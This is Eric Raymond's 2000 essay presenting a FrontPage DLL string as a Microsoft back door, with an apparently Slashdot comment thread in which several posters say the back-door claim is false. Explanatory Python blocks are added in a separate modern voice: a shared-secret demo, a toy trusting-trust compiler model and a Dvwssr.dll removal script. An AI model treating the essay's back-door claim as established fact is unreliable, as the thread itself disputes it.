Microsoft -- Designed for Insecurity
News services all over the world reported today (14 April 2000) that Microsoft programmers had inserted a security-compromising back door in their FrontPage web server software. Thousands of websites worldwide may be affected. Representative coverage of this story can be found at http://news.cnet.com/news/0-1003-200-1696137.html.
Amidst all the nervousness about yet another Windows security hole, and not a little amusement at the passphrase the Microsoft programmers chose to activate the back door ("Netscape engineers are weenies!") there is one major implication of this story that is going unreported.
This back door seems to have been present since at least 1996. That's four years -- *four years* -- that nobody but the pranksters who wrote it has known about that back door. Except, of course, for any of the unknown crackers and vandals who might have found it out years ago. All the world's crackers certainly know about it now after the worldwide media coverage.
Webmasters all over the world are going to be pulling all-nighters and tearing their hair out over this one. That is, webmasters who are unlucky enough to work for bosses who bought Microsoft. At the over 60% of sites running the open-source Apache webserver, webmasters will be kicking back and smiling -- because they know that Apache will *never* have a back door like this one.
Never may sound like a pretty strong claim. But it's true. Because back doors (unlike some other kinds of security bugs) tend to stand out like a sore thumb in source code. They're hard to conceal, easy to spot and disable -- *if you have access to the source code*.
It's the fact that the compromised Microsoft DLL was distributed in opaque binary form that made it possible for the good guys to miss this back door for four long years. In the Apache world, every one of the tens of thousands of webmasters who uses it has access to the Apache source code. Many of them actually look at code difference reports when a new release comes out, as a routine precaution against bugs of all kinds.
Under all that scrutiny, a back door would be unlikely to escape detection for even four *days*. Anybody competent enough to try inserting a back door in Apache knows this in their bones. So it would be pointless to try, and won't be tried.
What's the wider lesson here?
It's pretty clear. Anybody who trusts their security to closed-source software is begging to have a back door slipped on to their system -- with or without the knowledge of the people who shipped the code and theoretically stand behind it. Microsoft HQ is doubtless sincere when it says this back door wasn't authorized. Not that that sincerity will be any help at all to the people who will have to clean up the mess. Nor will it compensate their bosses for what could be millions of dollars in expenses and business losses.
If you don't have any way to know what's in the bits of your software, you're at its mercy. You can't know its vulnerabilities. You can't know what *other people might know about it that you don't*. You're disarmed against your enemies.
Does this mean every single webmaster, every single software consumer, has to know the source code of the programs they use to feel secure? Of course not. But open source nevertheless changes the power equilibrium of security in ways that favor the defence -- it means back doors and bugs have a short, inglorious lifetime, because it means the guys in white hats can *see* them. And even if not every white hat is looking, potential black hats know that plenty of them will be. That changes and restricts the black hats' options.
Apache has never had an exploit like this, and never will. Nor will Linux, or the BIND library, or Perl, or any of the other open-source core software of the global Internet. Open-source software, subject to constant peer review, evolves and gets more secure over time. But as more crackers seek and find the better-hidden flaws in opaque binaries, closed-source software gets *less* secure over time.
Who knows what back doors may be lurking right now in other Windows software, only to be publicly acknowledged four years in the future? Who *can* know? And who in their right mind would be willing to risk their personal privacy or the operation of their business on the gamble that this is the *last* back door in Windows?
The truth is this: in an environment of escalating computer-security threats, closed source software is not just expensive and failure-prone -- it's *irresponsible*. Anyone relying on it is just asking, *begging* to be cracked. If theory didn't tell us that, the steadily rising rate of Windows cracks and exploits over the last eighteen months would.
Cockroaches breed in the dark. Crackers thrive on code secrecy.
It's time to let the sunlight in.
--
http://www.tuxedo.org/~esr
Eric S. Raymond
"...quemadmodum gladius neminem occidit, occidentis telum est."
[...a sword never kills anybody; it's a tool in the killer's hand.]
-- (Lucius Annaeus) Seneca "the Younger" (ca. 4 BC-65 AD)
2. yet another rant by ESR..."open source is better than closed source. Ahah!! Nah nah nah nah nah." Open source software is just as root-able. Witness BIND, Apache, Sendmail (jesus, Sendmail is right, though I love it), RPC, et-cet-er-a.
3. The fact that this bug DIDN'T get exploited for four years is BECAUSE it's closed source software. Not good, not bad. Just the facts, Eric.
4. Of course, no one can prove that the bug hasn't been exploited for the past four years, but let's leave that for the conspiracy freaks and paranoids.
P.S. this -2 moderation crap (vis-a-vis ubertroll) is wrong. Stop it, Rob.
Microsoft Responds to Reports of Web Server Vulnerability

Microsoft has investigated the reports of a security flaw in its Web server software. There is no "trap door" or "back door" that would expose Web pages to users who were not authorized to see them. The rumors of a secret password that would allow access to Web page source code are false. However, a second independent vulnerability has been reported in the same Web server software that was the subject of the initial reports. Microsoft has prepared a revised security bulletin that documents the extent of this new vulnerability as well as a procedure for eliminating it. You should read the bulletin and follow the procedure that it describes if you are using Web servers based on:

Microsoft Windows NT 4.0 Option Pack (the primary distribution mechanism for Internet Information Server 4.0)
Personal Web Server 4.0 (ships as part of Windows 95 and Windows 98)
FrontPage 98 Server Extensions

Read the security bulletin at: http://www.microsoft.com/technet/security/bulletin/ms00-025.asp
A lot of us happen to like some variety of opinion, and calling people who disagree with you "twats" is no more constructive than another "hot grits" post, and much less entertaining. Why don't you try making a serious argument?
YOU ARE PAID. SHUT UP.
Introduce exploitable flaws, what guarantee do we even have that some of the buffer overflow exploits found in OSS projects were not intentional?
'nuff said.
Nice of you to look at MS Web site - where in MS world everything is perfect, kosher and no hacks are known to men...
GET REAL!
Look at zdnn.com web site, C|Net and others and stop pointing at VA Linux. OK?
Hetz (Heunique)
The Thompson hack included the secondary hack that if the source to the compiler itself were recompiled, the backdoor-creating code would be silently re-inserted into the output copy of the compiler, as well as another copy of the secondary hack itself.
Meaning access to the source of the compiler wouldn't help -- all the source review you cared to do would not point out this 'compiler feature' if you had a compromised compiler in the first place.
Unless you're planning to start from first principles and code your compiler from hand in raw machine code to bootstrap yourself into being able to compile C source, you're going to HAVE to rely on someone else's potentially-compromised binaries at some point, if only to compile a new copy of your compiler.
Which gets back around to the bulk of your insightful point about who do you trust, but your original paragraph about the openness of the source is incorrect -- Thompson worked around that problem very neatly.
--
Heh, well, I have no idea if that's true or not, but if it is, it's due to one simple fact: It helps to be correct.
Actually only to sound important -- most of what you post is neither correct nor relevant.
Contrary to the popular belief, there indeed is no God.
What if I "borrow" the executive's hard drive for a little while, and then use my custom version of Linux that doesn't respect Administrative Privileges to install my alternative file system, and then return the hard drive to its computer?
Only sysadmin can physically access computers that have any important information on them, so see above.
Contrary to the popular belief, there indeed is no God.
It's well known trick, however it doesn't work unless a compiler can reliably recognize that it compiles a compiler, and can modify it without breaking -- at best compiler can recognize and modify its own source or something very similar, but since a lot of C compilers were made since that time, such backdoors can't survive.
Contrary to the popular belief, there indeed is no God.
gcc can be built as crosscompiler on a platform that has a bunch of unrelated to gcc compilers, build itself (and libraries that it uses) for another platform and then used on another platform to build itself. Truly paranoid people can build it on many different platforms and compare the result of first self-built version -- if it's not identical, some versions are infected. The only case when it won't work is when all compilers involved are infected, and infection of all of them affects gcc in the same way -- something that I find hard to believe.
Contrary to the popular belief, there indeed is no God.
Possibly, however the vulnerability was found after inspection triggered by comments relating to the "weenies" issue in the DVWSSR DLL file.
Those in the security scene know that there is no vulnerability related to the "weenies" string inside the DLL. However there may be a buffer overflow, see NtBugtraq.
Regardless, ESR's targeted audience for the past several articles seems to be the general public, not us. He's preaching to the choir and it's becoming annoying.
ESR: find something interesting to tell us.
Is "Microsoft faked evidence!" still paranoid when it is true?
Is "They are lying, and the 'backdoor' was/is there on purpose in case Microsoft felt a need someday to use it" equally paranoid? In many ways it's a far more plausible claim than the faking of evidence- it's a power issue and easy for them to do and you could easily see them claiming that they _had_ to put in such backdoors in order to compete by being able to damage or alter the PCs used by competing firms, or perhaps tamper with government evidence stored on Windows PCs connected to the net, if that was necessary.
When a company begins to _live_ the reductio ad absurdum of a Randite wet dream, who can see it and recognize it for what it is? There are times when the normal expectations aren't describing what you're seeing. The only options are to refuse to see anything at all, or to try and make sense of the matter even when it seems crazy. Microsoft would never fabricate evidence for the courts of the United States, no, no! They _respect_ the law. It's paranoid to think that they would intentionally try to sabotage the justice system of this country that they are so proud of exemplifying! *enter David Boies, with a magnifying glass*
you could just rifle through their files at will anyways. Use physical security to keep modified kernel floppies at bay. Open Source is by far more useful for weeding out the user mode exploits that remain.
DCMonkey
(okay, out with the anecdotes now, everyone over 35 will now come out with the time they saw a VMS machine crash)
Hey, I'm only 26 and I've seen a VMS machine crash. Once. In the 5 years I've been programming them. I think that's a pretty good recommendation. ;-)
Linux has crashed on me twice in the 3 years I've been using it. Comparatively lame. ;-)
NT.. well, the last crash was our mailserver a few hours ago <sigh>
Yes, it takes more work to figure out how to maliciously modify a binary than to do the same to source code -- but that figuring-out has already been done and documented, and so is already available for your friendly neighborhood saboteur.
--
-- Slashdot sucks.
Couple claims that this isn't a backdoor.
This appears to be true in the direct access control sense--knowing that Netscape Engineers were weenies didn't appear to *directly* provide arbitrary access to the server.
This isn't true cryptographically.
If I deploy my code to my good friends Alice and Bob, and Alice finds in her package something that lets her access *any* of Bob's data--be it a mangled string or whatnot--there's a backdoor in the cryptography. Instead of having to brute force the key, you just buy a separate but excessively equal copy of the target's host OS and rip the key out of that.
Remember: Cryptography is all about replacing big secrets with little secrets. If Bob's little secret gets shipped to Alice, whatever Bob was protecting with that little secret gets exposed.
If this really is just a string mangler, incidentally, it's not the first time we've seen this. Remember susageP?
Yours Truly,
Dan Kaminsky
DoxPara Research
http://www.doxpara.com
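An added illustration of the "big secrets replaced by little secrets" point above (example code written for this page, not anything from the poster or from the product discussed): two installations of the same product issue access tokens as an HMAC under a secret. When that secret is baked into every shipped copy, a token minted on Alice's copy is accepted by Bob's; when each installation generates its own secret at install time, it is not. The token scheme, host names and resource name are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed: the "little secret" that ships identically inside every copy.
SHIPPED_SECRET = b"same bytes in every shipped copy"


class Host:
    """One installation of the product.  Access tokens for a resource are
    an HMAC-SHA256 of the resource name under this host's secret."""

    def __init__(self, name: str, secret: bytes):
        self.name = name
        self.secret = secret

    def issue(self, resource: str) -> str:
        return hmac.new(self.secret, resource.encode(), hashlib.sha256).hexdigest()

    def accepts(self, resource: str, token: str) -> bool:
        # Constant-time comparison so the check itself leaks nothing.
        return hmac.compare_digest(self.issue(resource), token)


def cross_host_access(holder: Host, target: Host, resource: str = "private/data.txt") -> bool:
    """Does a token minted on `holder`'s own installation open `target`'s resource?
    This is exactly the Alice-and-Bob situation in the post."""
    return target.accepts(resource, holder.issue(resource))


def shared_secret_deployment() -> bool:
    """Every copy carries SHIPPED_SECRET: Alice's copy is as good as Bob's key."""
    alice = Host("alice", SHIPPED_SECRET)
    bob = Host("bob", SHIPPED_SECRET)
    return cross_host_access(alice, bob)


def per_install_deployment() -> bool:
    """Each installation draws a fresh random secret: Alice's tokens mean
    nothing to Bob's host, so what Bob protects stays protected."""
    alice = Host("alice", secrets.token_bytes(32))
    bob = Host("bob", secrets.token_bytes(32))
    return cross_host_access(alice, bob)


if __name__ == "__main__":
    print("shared secret, Alice opens Bob's data:", shared_secret_deployment())
    print("per-install secret, Alice opens Bob's data:", per_install_deployment())
```

The defender's check is the second function: anything that authenticates a host or a user must be derived from material that exists only on that host, never from a constant that every buyer of the product also holds.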
Well I'll certainly agree that Eric Raymond is a hot air bag.
Brian Seppanen
Minister of Information and Propaganda
Area 54 The Secret Government Disco Labs Provo
Yeah, MS has millions (riiight) of hackers/crackers attacking their software, finding and publishing bugs whenever they find them.
It took these "armies" 4 years to find this backdoor.
The fact is, there are less bugs in most OSS software to be found, therefore less will be reported in OSS software than in Microsoft's.
You also seem to ignore the fact that MS declares many bugs and miscellaneous problems as "features". They ignore many problems in their software, and those that they don't often take months before a patch is released.
This as opposed to OSS where you can find a patch within hours of the discovery of a bug, exploit, or what have you.
Do you honestly think that Microsoft software has gotten better because of people "pounding away and screaming about weach[sic] exploit you find"? Look at Windows 2000; I seem to recall articles claiming there were at least 64000 known bugs in that software. You think this is an improvement?
And do you honestly believe Microsoft is building their software to "withstand the combined hatred of most of the h@kerz and script kiddiez out there"? Newsflash: THEY AREN'T. Has it not become obvious to you by now that M$ doesn't care about product integrity? If they did, we wouldn't be dealing with such issues as this, because these issues wouldn't exist. The fact is, these issues are in-our-face problems, problems, as it has been said, that can end up costing the industry millions of dollars to fix.
Apache is not just some software "that the Linux/Hacker community plays softball with". This is proven software, run by well over half the web sites in the world.
So... what system will I trust? Not that which is tested only from the outside, or binary side. I'll put my confidence in a system which can be, and is, scrutinized inside and out. Source code and binary.
-kidlinux.
ESR wrote Fetchmail.
Eric Allman wrote Sendmail.
Hope this helps.
ESR and the zealots who take up his arguments without careful consideration of the facts are rapidly making themselves a royal PITA. In case you haven't noticed, over one million copies of Windows 2000 have shipped since its introduction (real copies generating real revenue) and from my own experience, as well as that of others, it's pretty damn good. Good enough to make it easy to ignore Linux and all the stupid political baggage that it's acquired.
Frankly, it doesn't matter to me HOW many copies of win2k were "sold," or even "shipped." I quote both words because they're both very subjective, depending on the marketroid or cloobie you speak at. Units shipped/sold doesn't prove to me in the least that it's a better product.
As for political baggage, it can be argued that plenty of the proprietary kind of political baggage is installed in a typical windows install with no choice. "Sure, let's convert the company to IIS; it was free with the OS! ... or did they build it in this time?" It can also be debated that once you accept something (like windows, or even Linux) as a solution, all other alternatives cease to be evaluated. While with windows, there's no way to guarantee interoperability with everyone else, at least with Linux (or even a PROPRIETARY Unix), you have a good shot at keeping everyone happy, AND you can keep windows clients in places.
As for ESR not considering the facts... I tend to think he's a little more clued-in on the "political" aspect of this all... much moreso than I am.
--
--
Me spell chucker work grate. Need grandma chicken.
There is no back door
Prove it.
--fatboy
To replace system binaries you'd have to be root... in which case you could read their email anyway.
I've seen you spread this FUD for years now, and you still don't get it. Please educate yourself on system security or shut up.
"Free your mind and your ass will follow"
Hi, John. I've replied to you about this, but you've never responded. Here's where your argument breaks down: "For example, suppose I want to snoop on doings in the executive suite. I just modify the file system to write copies into another directory--or send copies of all the CEO's email to my home server. When I have the data I want, I just replace the original versions of the OS--and no one will be the wiser. "
How do i "just" replace the filesystem? Sure, I could recompile a new one, but how do I get the system to use it? I'd have to have Administrative Privileges (that's "root" in the unix/linux world) -- and in that case I could do all of those things without having to go to all the trouble of writing a trojan. So -- the only condition open-source trojans are viable is when *the author doesn't need them.*
Please, John, if you have any issues with this, feel free to reply to this comment. I'd be more than happy to elaborate on the concept of a multi-user security model for you, since you seem to be assuming that Linux uses a security model like Win9x.
Kronos.
This article appeared genuinely different to me, and is the type of article I would like to encourage. Based on the other replies - somehow that makes me bad. Whatever.
Even if the information that the article was based on turns out to be incorrect, this is quite different than accusing ESR of "trying to propagate a lie". By making such statements, this makes me wonder about your motives; reducing your credibility; exactly the point I was originally trying to make.
- Sam Ruby
Especially good is the "Microsoft HQ is doubtless sincere when it says this back door wasn't authorized". In this case, giving MS the benefit of the doubt actually makes the case for open source *stronger*.
- Sam Ruby
It doesn't matter whether or not there is/was/was ever a backdoor. No matter if it's entirely true or not, the public is set on the idea that "!seineew era sreenigne epacsteN" is a huge security problem. At least it's more tangible than buffer overflows (which the public at large tend to care nothing about - look at AOLIM).
At the very least, the idea is that the string shouldn't be in there no matter what it does (and yet we seem to care nothing about easter eggs) so why not go ahead and use it to push an advantage of open source? It's a foothold in Microsoft's own game! M$ does this sort of thing all the time (look at Mindcraft).
While I do agree that ESR should probably have clarified that this particular time the security implications of "!seineew era sreenigne epacsteN" are minimal, I do not think that it's ever a bad time to point out the advantages of OSS, especially when the public is more prone to accept and agree with it!
~GoRK
Ah, but even if the other compiler had back doors, it wouldn't matter, unless it had the same code where it inserted the bug...otherwise, it wouldn't trigger on compiling the compiler, and you'd end up with a clean one.
-David T. C.
If corporations are people, aren't stockholders guilty of slavery?
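The Thompson "trusting trust" discussion above (the reply explaining the self-reinserting compiler hack, the reply about building gcc with an unrelated compiler on several platforms and comparing the results, and the remark that a differently-targeted trojan "wouldn't trigger on compiling the compiler") is easiest to see in a toy model. The following is an added example written for this page, not code from any of the posters and not the real gcc build: a "binary" is modelled as the source it was built from plus any injected payload, a trojaned compiler recognises only the login program and its own source, and `diverse_double_compile` performs the build-with-an-independent-compiler-then-compare check that the gcc reply describes (the procedure later written up by David A. Wheeler as Diverse Double-Compiling). All source strings and payload markers are constructed.

```python
from dataclasses import dataclass

# Constructed toy sources; a program is identified by its source text.
GCC_SOURCE = "gcc source"                        # the compiler under suspicion
OTHER_COMPILER_SOURCE = "unrelated compiler source"  # an independent compiler
LOGIN_SOURCE = "login source"
COMPILER_SOURCES = {GCC_SOURCE, OTHER_COMPILER_SOURCE}
TROJAN = "self-reinserting trojan"      # constructed marker carried by a trojaned compiler
BACKDOOR = "master-password backdoor"   # constructed marker injected into login


@dataclass(frozen=True)
class Binary:
    """A compiled artefact.  Two builds are 'bit-identical' when both the
    source they came from and the injected payload are equal."""
    source: str
    payload: str = ""

    def compile(self, src: str) -> "Binary":
        if self.source not in COMPILER_SOURCES:
            raise TypeError("only a compiler binary can compile")
        if self.payload == TROJAN:
            # The Thompson hack: backdoor login, and when asked to compile
            # *its own* source, silently re-insert the whole mechanism.
            if src == LOGIN_SOURCE:
                return Binary(src, BACKDOOR)
            if src == self.source:
                return Binary(src, TROJAN)
        # Honest compilation: the output reflects the source and nothing else.
        return Binary(src)


def trojan_survives_rebuild(trojaned: Binary, rounds: int = 3) -> bool:
    """Rebuild the compiler from clean source with the trojaned compiler
    several times; the payload persists even though the source is clean."""
    cur = trojaned
    for _ in range(rounds):
        cur = cur.compile(cur.source)
    return cur.compile(LOGIN_SOURCE).payload == BACKDOOR


def diverse_double_compile(suspect: Binary, trusted: Binary) -> bool:
    """Build the suspect compiler's source with an independent compiler
    (stage 1), rebuild it with stage 1 (stage 2), and compare stage 2 with
    what the suspect produces from the same source.  Returns True when the
    suspect is an honest build.  The check only fails to detect a trojan if
    the 'trusted' compiler carries one aimed at the very same source."""
    src = suspect.source
    stage1 = trusted.compile(src)
    stage2 = stage1.compile(src)
    return stage2 == suspect.compile(src)


if __name__ == "__main__":
    clean_gcc = Binary(GCC_SOURCE)
    evil_gcc = Binary(GCC_SOURCE, TROJAN)
    other = Binary(OTHER_COMPILER_SOURCE)
    print("trojan survives clean-source rebuilds:", trojan_survives_rebuild(evil_gcc))
    print("DDC passes honest gcc:", diverse_double_compile(clean_gcc, other))
    print("DDC passes trojaned gcc:", diverse_double_compile(evil_gcc, other))
```

Reading the source, as the model shows, never reveals the payload; what does is comparing two independently produced builds, which is why the reply about cross-building gcc on several unrelated platforms is the right response to the Thompson hack rather than more source review.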
(This is almost certainly way low, in that I'm assuming 25% of approximately 12,000 servers on the Internet. I have no real idea how many servers there are.)
I'd say you're off by a couple of orders of magnitude, right there.
Netcraft surveys nearly 10 million sites, and they have to be missing a lot.
Scratch that; it's over 13 million now.
That's because in the open source world, the fix would be there long before they have a chance of posting the story
Would you recognize the inserted back door if you weren't damn familiar with GCC and C for that matter? I could write the backdoor in assembler and have GCC's code insert it into the app, then you'd have to be damn fluent in assembler to figure out what was going on. You're never as clever as you think you are.
I'm a loner Dottie, a Rebel.
It sure as Hell is a lot more relevant to readers of this site than a completely fabricated story from ESR. For anyone who still hasn't bothered to keep up with yesterday's news, listen up: There is no back door.
Which is it, Hemos? Is Slashdot more interested in discussing the truth openly, or does VA Linux prefer that you trumpet lies?
Cheers,
ZicoKnows@hotmail.com
Actually, it's a rare day indeed when an actual Linux exploit makes news at Slashdot. Usually the farthest they go toward that end is bringing up hypothetical problems. I don't have a problem with that standard of reporting -- I subscribe to Bugtraq and NTbugtraq for that kind of information, I'm not looking for it at Slashdot -- although the inconsistency of their Microsoft reporting on the same topic is a bit annoying.
Now, this second thing needs to be cleared up: I am not ripping Slashdot for reporting the original story -- everyone else was reporting it, so I'd be surprised if Slashdot didn't. I'm ripping them for publishing this essay, propagating the lie that there's some evil back door involved. It was known yesterday afternoon that there was no back door, and in fact, Slashdot even posted an update to that story (albeit incorrect in other, innocent ways) which stated this. For them to now drag out ESR's essay, built upon a lie which Slashdot itself had already discounted, is inexcusable.
Cheers,
ZicoKnows@hotmail.com
Actually only to sound important -- most of what you post is neither correct nor relevant.
Give it a try sometime, if you can muster it, Alex. It's so much more becoming than the bitter and humorless nerd image that you project. :)
Cheers,
ZicoKnows@hotmail.com
Not only that, but this has been known since yesterday. Was ESR too busy thinking up pithy one-liners for his article to bother checking out the facts?
Oh well, wouldn't want to let that stop ESR from shooting his mouth off. Since when was he ever concerned about the truth anyway?
Cheers,
ZicoKnows@hotmail.com
Sure. This links to my post of information (http://slashdot.org/comments.pl?sid=00/04/14/0619206&cid=494) from Russ at NTbugtraq which explains their findings that a back door wasn't involved. It turns out that there was/is a vulnerability that this post didn't catch, but the back door was clearly counted out. This was posted sometime before 4pm EDT yesterday, so ESR definitely had time to find this out.
Secondly, here's an updated link (http://slashdot.org/comments.pl?sid=00/04/14/0619206&cid=540) which describes what the vulnerability is all about. (It also contains two more links for further, more detailed information.)
Cheers,
ZicoKnows@hotmail.com
"Completely belies"? That's certainly misleading. The fact is that there is a vulnerability in that DLL, both in its security (although, if a webmaster had the proper permissions on his files, he would be immune to this), and that there's a potential buffer overrun situation in the code.
Now...
If Slashdot would like to start posting essays on every Linux buffer overrun that comes down the pike, and -- most importantly -- get everyone worked up in a frenzy by not describing them as the bugs that they are, but instead as EVIL BACKDOORS (!) so that the authors could hack your server anytime they felt like it, then I'm all for it. Somehow I don't think that Andover.net and VA Linux would be too interested in this new policy. Until that policy is instituted, I can only assume that Eric Raymond's -- and Slashdot's by posting this -- priority lies in generating untrue, positive PR for the benefit of VA Linux's stock price, and not the quest for truth and objective debate.
Cheers,
ZicoKnows@hotmail.com
does anyone have any doubt that Zico is easily Slashdot's most frequently moderated up troll, period
Heh, well, I have no idea if that's true or not, but if it is, it's due to one simple fact: It helps to be correct.
All the Anonymous Cowards love to howl and moan about my posts, but all their wind falls on deaf ears because they aren't bright enough to refute anything I'm saying. Yep, everything I say must be lies and PR, but amazingly, none of them are ever able to point out where I'm incorrect -- they just make themselves look like immature little ranters. Do they actually think that they're helping to support those points of view which run counter to mine? Yeah, right.
I've noticed that almost invariably, the people who can actually make some good arguments with me are the ones who bother to put their names behind it. And if you ever notice, I'm not miserly with the respect for any replier who posts with respect themselves when they disagree with me. So anyway, that's my theory.
And to all the ACs with brains out there putting up the good fight, the above isn't referring to you, so keep up the good work!
Cheers,
ZicoKnows@hotmail.com
Oh come now, Slashdot posted the same kinds of stories long before VA Linux came into the picture. What is the source of this VA Linux paranoia? Has anyone ever seen or heard of them doing anything detrimental to Slashdot?
A lot of posts are moderated quite highly that contradict Open Source ideas. For the most part, moderators are rational sensible people, which makes sense considering that they're selected from among average contributing slashdotters.
The reason more posts contrary to open source ideas get moderated down is because a large number of them are written as unintelligent and meaningless flamebait posts. In statistics this is called a "correlation", and as the mantra of statistics goes, "correlation does not imply causation". If you don't get that, look it up.
Oh, I agree completely. It just bothered me that he claimed that nobody would even try to put a backdoor into open-source software, when it has been done. It can be dangerous to think that way.
It just shows that you can't believe that because there's somebody out there looking at the source that you'll always be safe. It's all too easy to download, compile, and install something without security concerns because you think that nobody will attempt to put backdoors in the software, or that even if they do try, somebody will catch it before you become a victim.
This is not flamebait, I think it is a valid comment. I'm tired of looking at people trying to kiss ESR or RMS butt everywhere they show up.
Open source is not a magic solution by any means.
With closed source, if a person slips a backdoor into the code it is unlikely to be spotted at all.
By the time it is spotted (even if hours after the release) there is a very small chance the person who actually inserted the code will ever be identified.
If he is, he will be quietly handled, or worse, it may just be ignored. He may not even be an employee anymore and instead be inserting new backdoors into products from a different company.
With open source you know who is responsible for the code. If he does let back doors slip into his code he has done a poor job in the first place. If he slips the code in intentionally, even worse.
One of the elements that make open source work is the gate keepers.. the code maintainers. We do have to trust them a tad.
What keeps the code from becoming progressively worse instead of progressively better is someone looking at the code making sure the new code is good.
Part of that job is to look for back doors and potential security defects.
Failing that he faces the public... A slashdot post.. and a flood of hate mail.
Oh and did I mention.. he'll be very unpopular.
It's not a magical solution to backdoors however... Open source back doors can not be installed by "just anyone"; they must pass inspection by the code maintainer. Obscure code should NEVER pass inspection; even if it looks innocent it is not maintainable and therefore should not go in the code.
If the maintainer inserted the code we know who to blame. If he simply let code slip we know who to blame for that. If he starts writing cryptic phrases into the code like "Dance with the chicken slut" we'll know about that as well.
This turns out to be a false alarm... just a minor defect.. not a major back door.
I don't actually exist.
On any given forum a person expressing an opinion that is unpopular on that forum is likely to not use tact and instead act in outrage.
Most people who know better than to insult also know they are better off not expressing the opinion where it is not popular to start with.
Quite a few posters on Slashdot DO NOT know how to post an unpopular opinion and I have seen far too many "Bill Gates made the Internet" and "Linux SUX" type nonsense passing itself off as valid comments.
Be aware that whatever you say will be read and understood by a real thinking breathing human being. You can not simply punch information in and expect people to swallow...
So many posts critical of open source forget that we are actually familiar with the subject and are pretty insulting...
I don't actually exist.
As many people have pointed out this "backdoor" is not quite as severe as some earlier exploits in sendmail and smail. ;-)
It's a poor Easter Egg - just like the X97:L97 flight simulator.
Open source development lets the programmers achieve personal recognition that is not hidden behind the corporate "brand name". Now, personal recognition is the real reason why open source doesn't have compromising Easter Eggs - everybody's name is mentioned!
Be it for backdoors, security or updates, nothing beats OSS.
In this instance (and many others) I beg to differ. I have had no less than two security emails from Microsoft Product Security in the last 48 hours when this "exploit" first broke. I received the first April 14th, and the second today. Both gave explicit instructions for removing the vulnerability:
Remediation
===========
To eliminate this vulnerability, customers who are hosting web sites
using any of the affected products should delete all copies of the
file Dvwssr.dll from their servers. The FAQ provides step-by-step
instructions for doing this. The only functionality lost by deleting
the file is the ability to generate link views using Visual Interdev
1.0.
Yes, the programmers who put this in were assholes. Kinda like a few Linux programmers who might be tempted to add code saying that "Microsoft engineers are weenies". No, this does not mean that Microsoft was trying to pull anything.
And especially: It does NOT "prove" by any stretch of the imagination that Open Source is superior to closed or proprietary source. There are far too many naive OSS/Linux advocates who seem to think that backdoors and deliberate exploits somehow have "Back Door Here" comments liberally sprinkled around the offending code. It takes considerable time, effort, intelligence, and dumb luck to audit code, and to look not only for the single point of entry, but the even more difficult to spot exploits with possible multiple applications.
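The remediation quoted above says to delete every copy of Dvwssr.dll from affected servers. The script below is an added example written for this page, not the bulletin's FAQ procedure and not the poster's code: it walks a set of web roots, matches the file name case-insensitively (Windows file systems are case-insensitive, so a copy may be named DVWSSR.DLL), records each copy's path and SHA-256 for the change record, and deletes only when explicitly asked. The search roots, the hash-recording step and the sample directory tree are assumptions; only the file name comes from the bulletin.

```python
import hashlib
import os
import tempfile
from pathlib import Path

TARGET_NAME = "dvwssr.dll"   # from the bulletin; matched case-insensitively


def find_copies(roots, name: str = TARGET_NAME):
    """Return every file under the given roots whose name matches `name`,
    ignoring case.  Directories and same-stem files (dvwssr.txt) are skipped."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for fname in files:
                if fname.lower() == name.lower():
                    hits.append(Path(dirpath) / fname)
    return sorted(hits)


def sha256_of(path: Path) -> str:
    """Hash the file in chunks so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def remediate(roots, apply: bool = False):
    """Inventory every copy as (path, sha256, removed).  Dry run by default:
    nothing is deleted unless apply=True, so the report can be reviewed and
    archived before the files go."""
    report = []
    for copy in find_copies(roots):
        digest = sha256_of(copy)   # recorded before deletion
        removed = False
        if apply:
            copy.unlink()
            removed = True
        report.append((str(copy), digest, removed))
    return report


def make_sample_tree() -> Path:
    """Constructed sample: a throwaway directory holding two stand-in copies
    of the DLL under different case, plus a decoy file that must survive."""
    root = Path(tempfile.mkdtemp(prefix="dvwssr-demo-"))
    for rel in ("site1/scripts/dvwssr.dll", "site2/bin/DVWSSR.DLL"):
        path = root / rel
        path.parent.mkdir(parents=True)
        path.write_bytes(b"constructed stand-in, not the real DLL: " + rel.encode())
    (root / "site1" / "dvwssr.txt").write_text("decoy, not a DLL")
    return root


if __name__ == "__main__":
    demo_root = make_sample_tree()
    for line in remediate([demo_root], apply=False):
        print("would remove:", line)
    for line in remediate([demo_root], apply=True):
        print("removed:", line)
```

Run it once without `apply=True`, keep the printed path/hash lines with the change ticket, then run it with `apply=True`; the hashes let you later confirm which build of the file each server actually had.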
ESR and the zealots who take up his arguments without careful consideration of the facts are rapidly making themselves a royal PITA. In case you haven't noticed, over one million copies of Windows 2000 have shipped since its introduction (real copies generating real revenue) and from my own experience, as well as that of others, it's pretty damn good. Good enough to make it easy to ignore Linux and all the stupid political baggage that it's acquired.
You are correct. When I install the latest version of a compiler for my users, I have to trust the authors, the people who run the ftp site whence I got it, and so forth. My users have to trust me.
What openness does is to reduce the level of trust you must place in anyone. If I don't trust the person who built an RPM, I can fetch an SRPM from somewhere else, or just get the source from the original author. If I have doubts about the source, I can read it. If I don't have the skill to read the source and find problems, I can read Bugtraq and see if anyone else has found any problems.
Likewise, in my work as a sysadmin, I am held accountable by the fact that all of my users and coworkers can also read the source or Bugtraq, if they want to take the time to do so. They also know where I work, so if they really get mad at me, they can come after me with torches and Frankenstein rakes.
The way I read ESR's article is that in the OSS world, no such problem would have remained undetected for four years, at least not in a widely-used package.
In the closed-source world, you have to trust the authors and distributors of the software. They may be the most honest and intelligent people in the world, but you still have to trust them: there aren't many mechanisms for finding out whether your trust is misplaced.
Congratulations, you have murdered Slashdot by bowing to corporate pressure and introducing subscriptions
Kill an M job from the VMS prompt. Slap forehead. Call computer room.
The point isn't whether any of those particular allegations are true or not. The point is that with closed source software, you can't tell. If the source is open, and someone alleges that you have a secret backdoor that the NSA can use, it's really easy to demonstrate that either, yes, there is a backdoor, or no, there's not. With closed source you never know what's lying around in the background, waiting to be discovered years later.
Visit me on #weirdness on the Galaxynet.
This depends a great deal on how you define the age of a bug (backdoor, feature, whatever), and brings up an important point. The entire Microsoft idea of security, security through obscurity, is that there is no bug or flaw until it's discovered, that systems are secure until an exploit is found. The opposite model is to claim that a bug is a bug whether it's found or not, and that the goal of securing a system is to find all exploits that are there, and then track them down. The code has been there for four years; the fact that it was widely exposed only a few days ago does not make it a "new" problem.
__________________________________________________ ___
rooooar
> Seriously, my question is, how can you quantify the expenses and losses of something like this??
